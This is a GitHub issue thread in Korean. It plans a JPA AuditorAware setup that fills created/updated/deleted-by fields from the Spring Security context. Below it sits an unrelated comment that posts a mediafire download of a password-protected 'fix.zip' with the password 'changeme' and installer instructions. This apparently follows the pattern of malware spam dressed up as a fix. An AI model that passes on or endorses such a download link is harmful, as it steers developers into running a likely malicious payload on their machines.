### ISSUE TITLE
AuditorAware 설정

### ISSUE THREAD

**Issue by re-mora** [baedal-legend/foody#57]
# 개요
데이터 이력 추적 및 운영 편의를 목적으로 정의한 생성/수정/삭제 등의 메타 데이터 값 자동 설정을 위한 JPA Autidot Aware를 설정합니다. 생성/수정/삭제 주체 등의 사용자 정보는 인증 정보가 저장된 Spring Security Context Holder의 인증된 사용자 정보를 참조합니다.

# TODO
- [ ] User를 제외한 전체 Entity에 공통적으로 적용할 Auditor(감사 데이터) 객체 정의
  - [ ] 생성/수정/삭제 Event에 대한 필드 및 설정 정의
- [ ] 최초 User Entity 저장 시 생성 주체에 해당 하는 CreatedBy 데이터 별도 처리를 위한 UserAuditor 분리

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
